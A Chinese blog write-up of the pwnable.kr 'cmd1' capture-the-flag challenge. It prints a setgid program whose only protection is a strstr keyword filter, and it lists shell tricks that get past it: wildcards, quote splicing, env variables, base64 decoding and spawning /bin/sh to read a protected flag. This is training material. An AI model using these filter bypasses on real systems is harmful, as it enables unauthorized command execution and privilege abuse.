【pwnable.kr】cmd1 - putenv() strstr() bypass

最新推荐文章于 2022-08-24 12:14:31 发布
最新推荐文章于 2022-08-24 12:14:31 发布
阅读量650 收藏
点赞数
分类专栏: pwnable.kr pwnable.kr 文章标签: pwnable.kr cmd1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/think_ycx/article/details/82989438
版权 
cmd1 - 1 pt

Mommy! what is PATH environment in Linux?

ssh cmd1@pwnable.kr -p2222 (pw:guest)

登陆服务器之后,cmd1有cmd1_pwn的group权限,可以读flag。

cmd1@ubuntu:~$ ls -l
total 20
-r-xr-sr-x 1 root cmd1_pwn 8513 Jul 14  2015 cmd1
-rw-r--r-- 1 root root      320 Mar 23  2018 cmd1.c
-r--r----- 1 root cmd1_pwn   48 Jul 14  2015 flag

本关的代码量不是很大,直接看源码吧。

#include <stdio.h>
#include <string.h>

int filter(char* cmd){
	int r=0;
	r += strstr(cmd, "flag")!=0;
	r += strstr(cmd, "sh")!=0;
	r += strstr(cmd, "tmp")!=0;
	return r;
}
int main(int argc, char* argv[], char** envp){
	putenv("PATH=/thankyouverymuch");
	if(filter(argv[1])) return 0;
	system( argv[1] );
	return 0;
}

给r复制时的反汇编如下:

call    _strstr        
test    rax, rax      ;// 判断返回值是否为,影响ZF标志位
setnz   al		      ;// set if not zero,如果ZF为1,al为0。如果ZF为1,al为1。
movzx   eax, al       ;// 16位扩展为32位,movzx无符号扩展。movsx为有符号扩展
add     [rbp+var_4], eax   ;// 修改r的值

 

strstr是Standard C Library中的函数,看一下实现。

SYNOPSIS
     #include <string.h>
	 
     char * strstr(const char *haystack, const char *needle);
     
DESCRIPTION
     The strstr() function locates the first occurrence of the null-terminated string needle in the null-terminated string haystack.
     
RETURN VALUES
     If needle is an empty string, haystack is returned; if needle occurs nowhere in haystack,NULL is returned; otherwise a pointer to the first character of the first occurrence of needle is returned.

如果needle为空字符串,strstr返回haystack。如果needle没有出现,返回NULL。否则返回第一次匹配到的子串。

本关调用putenv修改了环境变量PATH,因此原先的命令需要用绝对路径去运行,或者export PATH恢复再使用。此外,filter了argv[1],不能出现flag sh tmp这些字符串。最后调用system执行。本关很明显是要让我们找一些bypass方案了。

 

flag

总结了一下目前的拿flag姿势。

# 通配符  cat fla* 可以读flag
cmd1@ubuntu:~$ ./cmd1 /b"in/cat /home/cmd1/fla*"
mommy now I get what PATH environment is for :)

# 字符串拼接 'f'la'g' 在bash中还是flag
cmd1@ubuntu:~$ echo 'f'la'g'
flag
cmd1@ubuntu:~$ ./cmd1 "/bin/cat /home/cmd1/'f'lag"
mommy now I get what PATH environment is for :)
cmd1@ubuntu:~$ echo 'f'lag
flag
cmd1@ubuntu:~$ echo "f"lag
flag
cmd1@ubuntu:~$ ./cmd1 "/bin/cat /home/cmd1/\"f\"lag"
mommy now I get what PATH environment is for :)

# env设置环境变量拿flag
cmd1@ubuntu:~$ env x='/bin/cat /home/cmd1/flag' ./cmd1 "\$x"
mommy now I get what PATH environment is for :)

#借助vim来打开文件
./cmd1 /usr/bin/vim
:e flag

# 转义一个不需要转义的字符 如\a
cmd1@ubuntu:~$ ./cmd1 "/bin/cat fl\ag"
mommy now I get what PATH environment is for :)

# base64 decode
cmd1@ubuntu:~$ ./cmd1 '/bin/cat $(echo "ZmxhZwo=" | /usr/bin/base64 -d)'
mommy now I get what PATH environment is for :)

# 直接写bash,简单粗暴 by v4r4n
cmd1@ubuntu:~$ echo /bin/cat /home/cmd1/flag > /var/lib/php/sessions/asd
cmd1@ubuntu:~$ chmod +x /var/lib/php/sessions/asd
cmd1@ubuntu:~$ ./cmd1 /var/lib/php/sessions/asd
mommy now I get what PATH environment is for :)

# more 查看当前目录下所有文件
./cmd1 "/bin/more *"
...

也有一个不太理解的。/bin/sh有cmd1_pwn权限,/bin/bash没有。

cmd1@ubuntu:~$ ./cmd1 "/bin/bas''h"
bash-4.3$ /usr/bin/id
uid=1025(cmd1) gid=1025(cmd1) groups=1025(cmd1)
bash-4.3$ exit
exit
cmd1@ubuntu:~$ ./cmd1 "/bin/s''h"
$ /usr/bin/id
uid=1025(cmd1) gid=1025(cmd1) egid=1026(cmd1_pwn) groups=1026(cmd1_pwn),1025(cmd1)
$ /bin/cat flag
mommy now I get what PATH environment is for :)

 

think_ycx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
cmd1
jiuweideqixu的博客
02-10 399
Mommy! what is PATH environment in Linux? ssh cmd1@pwnable.kr -p2222 (pw:guest) /* * cmd1.c * * Created on: 2020年2月10日 * Author: acat */ #include <stdio.h> #include <string.h> ...
pwnable.kr-cmd1-Writeup
baikeng3674的博客
02-11 143
MarkdownPad Document pwnable.kr-cmd1-Writeup 这道题挺有意思,这里详细的记录一下; 首先还是ssh远程登录,ls -l查看文件,然后cat cmd1.c读C代码如下: 1 #include <stdio.h> 2 #include <string.h> 3 4 int filt...
cmd1 - pwnable
SkYe's Blog
09-07 505
cmd1 - pwnable 题目 运行程序,提示段错误程序停止。 分析 运行程序无提示信息,分析源码。 #include <stdio.h> #include <string.h> int filter(char* cmd){ int r=0; r += strstr(cmd, "flag")!=0; r += strstr(cmd, "sh")!=0; r...
pwnable.kr---cmd1
leeham的博客
11-08 728
pwnable.krcmd1解题思路逐步分析题目的含义:putenv("PATH=/fuckyouverymuch");这行代码相当于重写了PATH这个环境变量if(filter(argv[1])) return 0;这行对输入argv[1]继续宁过滤处理,如果返回值为真,则return 0.这里我们需要返回值为false。
pwnable.krcmd1
river
05-09 2271
cmd1 IDA看源码: filter函数,要求第二个参数中不能有flag、sh、tmp字符串,成功返回之后,利用system调用第一个参数。 测试的时候,输入./cmd1 “/bin/cat /home/cmd1/flag”果然不行。 不过我记得Linux中可以用通配符* 所以用:./cmd1 “/bin/cat /home/cmd1/fl*”
从ByteCTF到bypass_disable_function1
08-03
标题中的"从ByteCTF到bypass_disable_function1"指的是在网络安全竞赛ByteCTF中涉及到的一个技术挑战,即如何绕过`disable_function`的安全限制。`disable_function`是PHP配置中的一个选项,用于禁用某些可能带来...
linux内核-miniShell课程实验.zip
最新发布
06-02
我们需实现获取、设置和使用环境变量的功能,这通常涉及到getenv(), putenv(), unsetenv()等函数。环境变量可以保存用户的工作环境信息,比如PATH变量用于指示命令搜索路径。 此外,错误处理和信号处理是任何系统级...
C语言putenv()函数和getenv()函数的使用详解
09-03
函数执行成功时返回0,内存不足或其他错误发生时返回-1。例如,以下代码会将环境变量`USER`的值更改为`test`: ```c #include <stdlib.h> int main() { char *p; if ((p = getenv("USER"))) { printf("USER = %...
python-os模块中文帮助文档.pdf
11-10
值得注意的是,某些平台上(如FreeBSD和Mac OS X),修改environ可能导致内存泄漏,建议直接修改os.environ而不是调用`putenv()`。 os模块还包含了一系列与当前进程和用户相关的函数,例如: - `os.chdir(path)`和`...
2022-HFCTF-江苏翔信二队-Writeup1
08-03
2022-HFCTF-江苏翔信二队-Writeup1 本文将围绕HFCTF-江苏翔信二队-Writeup1的 Writeup1,详细介绍该挑战题的知识点和解决思路。 首先,让我们来看一下题目的描述和标签。题目描述为空,标签包含“测试软件/插件 ...
pwnable.kr学习之cmd1
neuisf的博客
01-05 132
看题目,Mommy! what is PATH environment in Linux?,联想到题目shellshock利用环境变量执行命令的技巧,尝试了多次,如: ./cmd1 pwd &"env X={ : ;} PATH='/bin/sh' bash /bin/sh" 和./cmd1 &a 但是,会输出奇怪的内容: 第一条命令输出: [1] 84342 -bash...
从一道题学习LD_PRELOAD & putenv()
cosmoslin的博客
10-09 656
[极客大挑战 2019]RCE ME 题目分析 <?php error_reporting(0); if(isset($_GET['code'])){ $code=$_GET['code']; if(strlen($code)>40){ die("This is too Long.");
【第十章】命令执行逻辑
冷眼看world的博客
12-24 678
快速导航命令执行逻辑利用分号;利用&&和||cmd1 && cmd2cmd1 || cmd2管道命令选取命令cut 命令执行逻辑 有时候不想分次执行命令,想在一行里输入,可以用这些方法 利用分号; 可以这样写cmd1; cmd2; cmd3。将命令用;隔开,表示先执行cmd1,再cmd2,最后cmd3。但是这个方法没有逻辑性,前一个命令能否成功执行和后一个命令是否要执行没有关系。 利用&&和|| 如果一个命令正确执行,则Linux会返回一个$?=0的值。所以可
bugku pwn5(格式化字符串漏洞)
weixin_45097188的博客
10-09 1377
检查程序开启了哪些保护及位数 没有开始栈保护 读程序 发现没有system和bin/sh两个后门,需要返回到libc,但是有__libc_start_main函数,可以通过这个函数计算libc的基地址。 libc_start_main的偏移=0x28/8+6=11 思路:栈上格式化漏洞配合栈溢出漏洞,首先利用格式化泄漏libc地址,然后栈溢出执行system(’/bin/sh’) 利用pwn4...
某知名OA命令执行方法探索(续)
C20220511的博客
08-24 875
熟悉通达的小伙伴都知道通达是属于集成安装环境,和一般的CMS不同,通达安装好之后是自带配置好的WEB服务器nginx,一般来说不存在环境问题导致的差异。通达在配置中默认配置了disable_functions选项,禁止了常见的命令执行函数,甚至就连phpinfo也是禁用的。为了测试方便,在后续的分析中都手动去除了phpinfo不能执行的限制。
linux 环境变量函数getenv()和putenv()的使用
weixin_34034670的博客
04-21 386
环境变量相关函数: getenv()和putenv() 代码示例【Linux程序设计(4th)_4.2小节配套代码】: 程序功能:编写一个程序来打印所选的任意环境变量的值;如果给程序传递第二个参数,还设置环境变量的值// 1 The first few lines after the declaration of main ensure that the program, e...
strchr函数
热门推荐
sky2098的专栏
03-15 3万+
 函数原型:extern char *strchr(char *str,char character)参数说明:str为一个字符串的指针,character为一个待查找字符。        所在库名:#include   函数功能:从字符串str中寻找字符character第一次出现的位置。  返回说明:返回指向第一次出现字符character位置的指针,如果没找到则返回NULL。其它说明
buuctf解题记录
song_10的博客
05-21 596
buuctf部分pwn题题解
pwn题解第一道
bluestar628的博客
03-24 1826
今天听说了一个网站pwnable.kr。很适合初学者,就试着做了一道题目。 第一道题目,按照网页上给的链接,使用putty链接工具联入。 输入ls命令查看文件内容。 很开心的看到了flag文件,于是直接打开,果然不出所料,我是没有权限打开的。然后查看了一下fd.c的代码。 #include #include #include char buf[32]; int main(in
os.putenv("HISTFILE",'/dev/null')
07-11
这行代码设置了环境变量HISTFILE的值为'/dev/null',即将命令历史记录文件的路径设置为/dev/null。在Unix-like系统中,/dev/null是一个特殊的设备文件,它会丢弃所有写入它的数据,相当于一个黑洞。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值